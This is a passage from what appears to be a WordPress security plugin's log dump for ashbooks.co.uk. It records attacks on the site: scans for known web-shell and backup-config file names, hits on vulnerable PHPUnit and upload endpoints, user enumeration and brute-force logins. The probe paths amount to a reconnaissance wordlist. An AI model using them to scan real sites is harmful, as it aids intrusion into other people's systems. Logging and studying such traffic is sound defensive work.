.2561,55,'nLUfg9APem2dxkGNl68CtZHc','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637685422.0178,55,'DA6Y2rQRnVat9OePSjqvJ1BX','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637685424.1608,55,'XpBcqV2CAKZF4sOuijNw8L5W','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('40.69.131.238',675644398,'',0,1637685426.6018,55,'QrqBh2zoJmMVDC8iGUbdgXjF','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('40.69.131.238',675644398,'',0,1637685428.8996,55,'YI6sdPXZoefSw72DpbMVuyjc','','19|0|0|0|ashbooks.co.uk/old-index.php'),('40.69.131.238',675644398,'',0,1637685430.8013,55,'p73blALxFT5gX9Bc0VzudCQa','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('40.69.131.238',675644398,'',0,1637685432.7532,55,'iDGrzXYbC94seJAKjOIvyF1M','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('40.69.131.238',675644398,'',0,1637685434.5019,55,'mqkSCvc72JXMzGgrBDheNjAd','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('40.69.131.238',675644398,'',0,1637685436.5481,55,'nAIu7ZB8gHEGXchPVNk0iDS9','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('40.69.131.238',675644398,'',0,1637685437.9318,55,'GHzVkw9ax27y0gEOtFXfScNY','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('40.69.131.238',675644398,'',0,1637685439.7199,55,'zcWUoyA9F51LvHunpZQ8Rh2C','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('40.69.131.238',675644398,'',0,1637685441.7620,18,'FN0iHq1ugpJGI2ndPD4zSltE','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('40.69.131.238',675644398,'',0,1637685443.3682,55,'DVKB6sE2nRGhqfWb3gFejOX8','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('40.69.131.238',675644398,'',0,1637685445.1583,100,'13IboGFS8w5kgHqQtXfdUDlx','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637685446.8670,100,'skB6jC7XqRQJUewOnNxT8DAE','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637685449.9705,55,'uYCGFeyj2Wqh80UZcmMSkHRJ','','19|0|0|0|ashbooks.co.uk/haders.php'),('40.69.131.238',675644398,'',0,1637685451.7875,100,'TkGLBEra5IyfvAlDMOxe9Voj','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('40.69.131.238',675644398,'',0,1637685453.8346,55,'PbavzEUsyVJ0IZYmnS1gLxtp','','19|0|0|0|ashbooks.co.uk/legion.php'),('40.69.131.238',675644398,'',0,1637685455.9422,55,'tDEiz1UYysL4Rf38NlQBodeX','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('40.69.131.238',675644398,'',0,1637685457.8056,55,'guMPioNApmI2qOfwvEeG4YRZ','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('40.69.131.238',675644398,'',0,1637685460.0073,55,'oZCaIrwKcAh6z8OLVHDlGYNq','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('40.69.131.238',675644398,'',0,1637685461.9900,55,'a6gJqoIvzN1tQYeXdTkOHBD9','','19|0|0|0|ashbooks.co.uk/up.php'),('40.69.131.238',675644398,'',0,1637685463.8889,55,'pDLkKjcQ9yvtJfnERISomiNW','','19|0|0|0|ashbooks.co.uk/upload.php'),('40.69.131.238',675644398,'',0,1637685465.5972,55,'qeW4vIZlcOiYu7Awbo2U1zpH','','19|0|0|0|ashbooks.co.uk/config.php'),('40.69.131.238',675644398,'',0,1637685467.4983,100,'1oIetdF4k5XnMgBy2NscvZRp','','13|0|0|0|ashbooks.co.uk/test.php'),('40.69.131.238',675644398,'',0,1637685469.6564,55,'yKat1QRSxZH6grbYTLw2IJ7e','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('40.69.131.238',675644398,'',0,1637685472.0004,55,'YjULyPtrWQI9kaX5lJ86mcRD','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('40.69.131.238',675644398,'',0,1637685474.1289,55,'dHgaVxIDp36Qh7SEPFJMet1X','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('63.141.252.69',1066269765,'ashbooks',0,1637689784.2872,51,'qDEmyk8hBlNVPt6LgIoZRO5s','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('23.228.109.147',400846227,'',0,1637696091.0804,55,'UIDqcG95JfsyT1z3hORYApmn','','19|0|0|0|ashbooks.co.uk/typo3conf/ext/hi_surveystats/res/php-ofc-library/ofc_upload_image.php'),('192.187.127.21',3233513237,'fmoyjvuy5u',0,1637696445.7525,51,'Fiuctrzad82PAkvyI6qDKogJ','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('157.245.156.140',2650119308,'',0,1637697682.1414,70,'B3cvSELRG6Qaf20eXZoJwY4i','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('69.30.231.155',1159653275,'ashbooks',0,1637698393.9037,51,'i63YUOF48MWveyEzPwxuGnoa','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('185.191.34.215',3116311255,'',0,1637698725.1455,55,'sbjzRt6Tr5cQiBa1lmvkEZHN','','19|0|0|0|ashbooks.co.uk/wp-includes/widgets/class-wp-widget-content.php'),('192.187.127.21',3233513237,'fmoyjvuy5u',0,1637699672.9120,51,'3cAorKnR2bejFXiN1xqIPdkC','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('40.69.131.238',675644398,'',0,1637700466.3536,55,'1G68cHomkpSUqi4LIwXO9fba','','19|0|0|0|ashbooks.co.uk/style.php'),('40.69.131.238',675644398,'',0,1637700469.1261,55,'aS7qTxRPXC85FjnicAswb2Bp','','19|0|0|0|ashbooks.co.uk/moduless.php'),('40.69.131.238',675644398,'',0,1637700471.4009,55,'VngB7yxrQae9RCYKTISlGo80','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('40.69.131.238',675644398,'',0,1637700473.2771,55,'GYcHoWwPQUEsdrKvqfAu63ni','','19|0|0|0|ashbooks.co.uk/admin.php'),('40.69.131.238',675644398,'',0,1637700481.1752,55,'1AiGqP8embHUSxtojJ3aWdBK','','19|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637700481.2239,10,'1AiGqP8embHUSxtojJ3aWdBK','','707|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637700482.9135,55,'xWyjraRfnCvlkUSZ5sJbNBTu','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('40.69.131.238',675644398,'',0,1637700484.8889,55,'xS3GhYPy47JLmwM5AXqidRnz','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('40.69.131.238',675644398,'',0,1637700486.8333,100,'1JjOyPxVFK8m36fC0NztQXnr','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('40.69.131.238',675644398,'',0,1637700491.6808,100,'70ioEncQ9fkj4gNlVtd3Rur2','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('40.69.131.238',675644398,'',0,1637700493.8429,100,'XSBIHzD63hM4xmd92kpteLTn','','13|0|0|0|ashbooks.co.uk/larva.php'),('40.69.131.238',675644398,'',0,1637700496.1307,100,'IeDnbgCQYuAWqv87N0BlL6zr','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('40.69.131.238',675644398,'',0,1637700498.1840,55,'YtvnFR6pJUi3kCHuWMj0sS7f','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('40.69.131.238',675644398,'',0,1637700499.8394,55,'bvF7yo3KkVmsehqNcwxjBOlI','','19|0|0|0|ashbooks.co.uk/alfa.php'),('40.69.131.238',675644398,'',0,1637700501.7079,55,'uFqLENgvMSKYzVotnaW21cAJ','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('40.69.131.238',675644398,'',0,1637700503.3858,55,'B2eThAoX7jyEO0CpxkNQDG8w','','19|0|0|0|ashbooks.co.uk/cindex.php'),('40.69.131.238',675644398,'',0,1637700505.1577,55,'7FLvIxglRfMXk3Bb0qdyr1HK','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637700509.4974,55,'1CivepjHsFZYTuWdVELAx2Jf','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637700513.3711,55,'YOdtgwLVPf4jiDErUkN0zobC','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('40.69.131.238',675644398,'',0,1637700515.3251,55,'6Nwi7lUPjsx0cozkrRAY1a3C','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('40.69.131.238',675644398,'',0,1637700518.1241,55,'Aa09XwlCLtRIQ872n5sMry6i','','19|0|0|0|ashbooks.co.uk/old-index.php'),('40.69.131.238',675644398,'',0,1637700520.7487,55,'TQyvNraU7t8d5mPWMEzqs0kB','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('40.69.131.238',675644398,'',0,1637700522.6461,55,'aSY5lyJLtv7B3GP2pqwU1Cg8','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('40.69.131.238',675644398,'',0,1637700524.7730,55,'bBluVKOp8mLSnoHE2qZA3YRj','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('40.69.131.238',675644398,'',0,1637700526.5509,55,'QNTPgL8rdHEMVF4XnxGzvReB','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('40.69.131.238',675644398,'',0,1637700528.2803,55,'tas9Ug1uIi2Kc0Okz3VCv4SW','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('40.69.131.238',675644398,'',0,1637700530.5726,55,'1WpEexr9X3RbS7aqyPsnLhNO','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('40.69.131.238',675644398,'',0,1637700532.5102,18,'nFmIVLbKryTZRxfOkhgSG34e','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('40.69.131.238',675644398,'',0,1637700534.6948,55,'GfLWn8dVkwoF0XRy59ZilU3x','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('40.69.131.238',675644398,'',0,1637700537.1641,100,'qFMcVRTNWGgep942DKYX6rdH','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637700539.6657,100,'WsHTJjBG7byEoqD2dx3Ltn8m','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637700541.6516,55,'2bsptGJrWQ9cXnYZOTleDmPH','','19|0|0|0|ashbooks.co.uk/haders.php'),('40.69.131.238',675644398,'',0,1637700543.9123,100,'Oqrs04fibYRPVWQJDFpyBtoL','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('40.69.131.238',675644398,'',0,1637700545.8165,55,'xwyCnVY8OKZQgaoSj17lkDUb','','19|0|0|0|ashbooks.co.uk/legion.php'),('40.69.131.238',675644398,'',0,1637700547.8526,55,'xurHB0UYmijCLDa9wAZbWyon','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('40.69.131.238',675644398,'',0,1637700550.6213,55,'qxh7O1RSmnBbA95Fi62JlzTo','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('40.69.131.238',675644398,'',0,1637700552.9589,55,'2QtJqjKoNBuEysTH971eMAlr','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('40.69.131.238',675644398,'',0,1637700555.1986,55,'6M5misFve2HnagQNCZoBSxGD','','19|0|0|0|ashbooks.co.uk/up.php'),('40.69.131.238',675644398,'',0,1637700568.0092,55,'kaJ1bgYXDGh49vmWlurBFsPR','','19|0|0|0|ashbooks.co.uk/upload.php'),('40.69.131.238',675644398,'',0,1637700570.1178,55,'AkKN9zn8DW5LCmwpqe0ivJbO','','19|0|0|0|ashbooks.co.uk/config.php'),('40.69.131.238',675644398,'',0,1637700571.7478,100,'9rtKvGjWJsXpd5koFxaR7U1Y','','13|0|0|0|ashbooks.co.uk/test.php'),('40.69.131.238',675644398,'',0,1637700574.0286,55,'aY6wdiW8URyP7xblC132pSIQ','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('40.69.131.238',675644398,'',0,1637700579.8633,55,'CVu9hrD5ojgFLUcemMSk8P0d','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('40.69.131.238',675644398,'',0,1637700582.8039,55,'Mq3SpbyfjGWszwr8oQCHktRc','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('185.12.15.132',3104575364,'',0,1637704889.2888,55,'au1ZY7BItSAqzwD9j5deX6c8','','19|0|0|0|ashbooks.co.uk/old-index.php'),('69.30.231.155',1159653275,'ashbooks',0,1637711028.0452,51,'gChM8KsYW9poZR0x41BrVGcD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.127.21',3233513237,'ashbooks',0,1637714817.0214,51,'gP7QnsvZYhjb4RmJ6uEWyLFc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('147.182.140.149',2478214293,'',0,1637714880.1078,55,'S4pZruBzKRtClmbO7v1JgjWG','','19|0|0|0|ashbooks.co.uk/phpinfo.php'),('147.182.140.149',2478214293,'',0,1637714884.8092,55,'sDgFqZiuvR8hLQASyKGbpYXx','','19|0|0|0|ashbooks.co.uk/info.php'),('69.30.240.26',1159655450,'fmoyjvuy5u',0,1637720669.7381,51,'eKMzjiA8HvrU4wXhTJ53n2uB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.225.182',1159651766,'fmoyjvuy5u',0,1637721676.2511,51,'EifclvhLdbRTQ1qO8eHmD40k','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('40.69.131.238',675644398,'',0,1637721990.3401,55,'5RViPL7jAHcIsOYNuMvGmhxw','','19|0|0|0|ashbooks.co.uk/style.php'),('40.69.131.238',675644398,'',0,1637721992.3107,55,'vP3AHyTsRZ9nIL6FXfjB0Vre','','19|0|0|0|ashbooks.co.uk/moduless.php'),('40.69.131.238',675644398,'',0,1637721994.5551,55,'lfaZQgjOmHLXR30t8ibFqYsw','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('40.69.131.238',675644398,'',0,1637721996.7656,55,'hiDMwqGRsQd0BoYTEWKNVfkU','','19|0|0|0|ashbooks.co.uk/admin.php'),('40.69.131.238',675644398,'',0,1637722004.3239,55,'hwXe4p5Mvx0H7Ffbs8TEqYAB','','19|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637722004.3774,10,'hwXe4p5Mvx0H7Ffbs8TEqYAB','','707|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637722006.2979,55,'Puzw2Q4ph56Yrf09em1y8kMv','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('40.69.131.238',675644398,'',0,1637722008.2134,55,'21LTMcgV3ZYeRSldPsHvywGB','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('40.69.131.238',675644398,'',0,1637722010.2487,100,'jHneIzEcVMxuwA0ySC4WNDvB','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('40.69.131.238',675644398,'',0,1637722014.4974,100,'8hm5BYZnbaocqexQ2L1437DV','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('40.69.131.238',675644398,'',0,1637722016.6109,100,'rJy0pmzqIcYKQ1Z2MUAgTB9l','','13|0|0|0|ashbooks.co.uk/larva.php'),('40.69.131.238',675644398,'',0,1637722018.9980,100,'Zj1Qt5ofK2uJNDyUATczWHpg','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('40.69.131.238',675644398,'',0,1637722031.8903,55,'9J6PqNerR2v1CZDQ3XKFu5Go','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('40.69.131.238',675644398,'',0,1637722037.5157,55,'XfTFY7mjSQiI9OyJ1lB2EKds','','19|0|0|0|ashbooks.co.uk/alfa.php'),('40.69.131.238',675644398,'',0,1637722039.6497,55,'JdRh2l5UgOXAKNsbItTWwjYH','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('40.69.131.238',675644398,'',0,1637722044.1861,55,'OmPkEiUZ7aBAqoFvdQ2360x8','','19|0|0|0|ashbooks.co.uk/cindex.php'),('40.69.131.238',675644398,'',0,1637722046.1210,55,'BGhvP96oir40VzdU8OEXFgHZ','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637722048.8819,55,'YD7qPbWpg3eRwoUOcyKTsnJ8','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637722051.1516,55,'KVbdXZyWj628keQ4UY7sBCnh','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('40.69.131.238',675644398,'',0,1637722053.3607,55,'kAVx8bRv9cyJUYhDTfrWo1qB','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('40.69.131.238',675644398,'',0,1637722055.6027,55,'Dxuc3ZEpe7FhTIbjHVSf2WvO','','19|0|0|0|ashbooks.co.uk/old-index.php'),('40.69.131.238',675644398,'',0,1637722057.6912,55,'G2CjXf0UOeWLHru6ya7wmh5d','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('40.69.131.238',675644398,'',0,1637722059.7147,55,'rdLgZKfampDOteX3NkWl9M1T','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('40.69.131.238',675644398,'',0,1637722061.6092,55,'4m2JaiKo1k3XhCY7SxpeQEGr','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('40.69.131.238',675644398,'',0,1637722063.3011,55,'uYoTcqj18QLJ0ZE5whHnaNdR','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('69.30.225.182',1159651766,'fmoyjvuy5u',0,1637722063.3393,51,'0vjNCK5rzWXDRsZY3iL8BAHT','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('40.69.131.238',675644398,'',0,1637722065.4010,55,'18hlRpOXNdtIa492K6ZzEvBV','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('40.69.131.238',675644398,'',0,1637722067.3032,55,'vBMaP3dlWfu8Tr9XY2K174OR','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('40.69.131.238',675644398,'',0,1637722069.3034,18,'wOeSykjlfstLzI861HRDd7Xh','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('40.69.131.238',675644398,'',0,1637722071.5204,55,'YeFaQHus8ijdBzpy7Cl4A92t','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('40.69.131.238',675644398,'',0,1637722073.7248,100,'y8giZF3emdr0VTC6U2I9cESo','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637722077.1656,100,'MPg9XBo5nNkYaDqVUF0ShudL','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637722079.2258,55,'dDbKmxG9HJIT62lFz18Bw3tf','','19|0|0|0|ashbooks.co.uk/haders.php'),('40.69.131.238',675644398,'',0,1637722081.0943,100,'0iFSaVhsynglXfHZMAQ78vGY','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('40.69.131.238',675644398,'',0,1637722083.3113,55,'FVM7vqunlhopy5gSRCkwLmNO','','19|0|0|0|ashbooks.co.uk/legion.php'),('40.69.131.238',675644398,'',0,1637722085.3551,55,'RLvyzefrlBZciTDHom5jJ4bq','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('40.69.131.238',675644398,'',0,1637722087.5307,55,'fdiqpsPVU7F6SbBoce938vwR','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('40.69.131.238',675644398,'',0,1637722089.3256,55,'1quVlx2Em8XJNTdfyICOzvpt','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('40.69.131.238',675644398,'',0,1637722091.1126,55,'aqoeHJmn9S2OMIsR0c6Uybki','','19|0|0|0|ashbooks.co.uk/up.php'),('40.69.131.238',675644398,'',0,1637722093.3142,55,'DEWAbnigRdr6TUwpGNBmFOqx','','19|0|0|0|ashbooks.co.uk/upload.php'),('40.69.131.238',675644398,'',0,1637722098.5581,55,'MUzvqGX1oaePjAighpr45Q2J','','19|0|0|0|ashbooks.co.uk/config.php'),('40.69.131.238',675644398,'',0,1637722100.2261,100,'1XwQMeByEHvPlWiru0jfmTYC','','13|0|0|0|ashbooks.co.uk/test.php'),('40.69.131.238',675644398,'',0,1637722102.1510,55,'r4UdOSDIL0MW3AJYZG5VpBcX','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('40.69.131.238',675644398,'',0,1637722104.2718,55,'w9lAk8MZT71xDeH5p3SbnKU0','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('40.69.131.238',675644398,'',0,1637722106.1997,55,'dgmM3ByQ09lLHo1epEOfUvxw','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('185.191.34.215',3116311255,'',0,1637729621.4325,55,'kzmDCuYKGtZrqswBIEgQOH0N','','19|0|0|0|ashbooks.co.uk/accesson.php'),('20.122.7.68',343541572,'',0,1637731216.0688,70,'gbyNXSzi9cMGQuEOfwdZ0vBD','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('107.150.57.35',1805007139,'ashbooks',0,1637731432.7159,51,'TJEWyczB8Mf3HGOUAD0b4dCu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.231.155',1159653275,'ashbooks',0,1637735003.0846,51,'hsVdoaH4IkiY7v2DuxnqZpeL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('157.245.156.140',2650119308,'',0,1637740995.1391,70,'up3amT4vDlA87GLcYHgyWEV9','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('157.245.156.140',2650119308,'',0,1637742220.0783,70,'D5pibcBWSfehgwtmGqJYHKnE','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('69.64.48.135',1161834631,'',0,1637742326.9311,70,'MyDQNdn9btGRcx4g3h2SuOiC','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('157.245.156.140',2650119308,'',0,1637750174.7895,70,'zKpFfPSxALX4dZBtIu968qTb','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('114.119.131.92',1920435036,'',0,1637752973.0796,55,'OzJu5I6Rw8XoPWvYQx9gysKp','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('165.227.115.229',2783146981,'',0,1637753447.6846,70,'5mnHja2bCYO9ZtNzQ7LIpf18','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/1'),('165.227.115.229',2783146981,'',0,1637753447.9233,70,'naC2Desz0ktxIFoJcbAVW1E7','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/2'),('165.227.115.229',2783146981,'',0,1637753448.4430,70,'DV6JMoBNy0KWPO7wXsY4rC8m','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/3'),('165.227.115.229',2783146981,'admin',0,1637753448.8959,7,'vKORzqQjLEcXg8wprtbfmCH7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'admin',0,1637753449.5801,7,'2Aybt9o5H84vZhPq6GdBRNFS','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'admin',0,1637753450.6685,7,'IXiQG3bKVedBJvx6wP8nSTpH','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'admin',0,1637753452.4500,7,'m2ksL40jKEhZ6d93zB1RCDIQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'admin',0,1637753453.1567,7,'Q2aWRbe9DjtgGNJoh4wzfP7k','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753453.1666,10,'Q2aWRbe9DjtgGNJoh4wzfP7k','','701|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753455.4673,50,'9NKEap5VzegoflwxRdXIjcmY','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753455.9318,50,'53fXWrQnzLvUAduOENtZDi1Y','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753456.8757,50,'80H2gzlXRSMxQ6eqOKUAyDnG','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753457.5088,50,'eoIBx7KThwqd9RsO4p3zPaQD','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753457.9191,50,'aJ14wDfos2K6C8HOIRTtnWPd','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753458.5544,50,'YgmROMNZFvV9Lzypos4Gr3ec','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753458.9871,50,'cr8fzFvehw0974UudLMDYAaQ','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753459.6571,50,'AXlsQbzmTEykVLHct7x3oYPZ','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753460.0809,50,'s7fQkoVZhyXLvSYA3b45Rqxu','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753460.7319,50,'ahmlJQypXcD9bvITACsnfRk2','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753460.7846,10,'ahmlJQypXcD9bvITACsnfRk2','','711|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753461.4047,50,'HnT5GBPpVcOXkRLfMoWiKJvr','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753461.9595,50,'0lEAMvIjh89HCdsNZtRFoVQB','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753462.6677,50,'aezO2Tn4g7Yy5hpDjW9iVo3x','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753463.4318,50,'lpB5v0KTZQycjEFXU1MGeVRn','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753463.9154,50,'43dtBFxXwAcbf6rpKCYLNh2W','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.115.229',2783146981,'',0,1637753464.6261,50,'2WpBIKlxGib0sqQfywg9ALnv','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('162.55.85.219',2721535451,'',0,1637753937.8212,55,'8ZOhCduraxGpmQ7K4sB9IDHA','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('159.223.62.33',2682207777,'',0,1637759413.4980,70,'o48e0JzpGSTsAltCr2Ed6vMu','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('157.245.156.140',2650119308,'',0,1637765735.0491,70,'hpYibaTqrnGFHI9W52JK18xD','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('67.205.3.33',1137509153,'',0,1637767920.5831,55,'z69PYWcJOK0bUfsjH4GntwRN','','19|0|0|0|ashbooks.co.uk/wp-admin/js/widgets/index.php'),('67.205.3.33',1137509153,'',0,1637767967.2531,55,'63ar2eyuHDtRmC7WBFLcNdwq','','19|0|0|0|ashbooks.co.uk/wp-content/uploads/2020/02/index.php'),('185.220.101.17',3118228753,'ashbooks',0,1637768315.4562,51,'IoNuH59igCm3j4ZMaqL0KbTl','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('47.117.83.25',796218137,'',0,1637772006.0346,70,'vfeLjx2digCHqKuY4k69rEhJ','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('47.117.83.25',796218137,'',0,1637772006.0358,70,'NShDvfZa4BomiPLkVWs80r2n','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('185.220.100.255',3118228735,'admin',0,1637773705.4247,7,'obk0qRfhEPTYd1iw3ULAOgDu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.231.155',1159653275,'admin',0,1637774668.8257,7,'Xf34sNAPYT92GWu1ecFyLhtr','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('178.128.216.116',2994788468,'',0,1637783881.8695,70,'zRrmQuVv94BYfKoGhnObkqJg','','0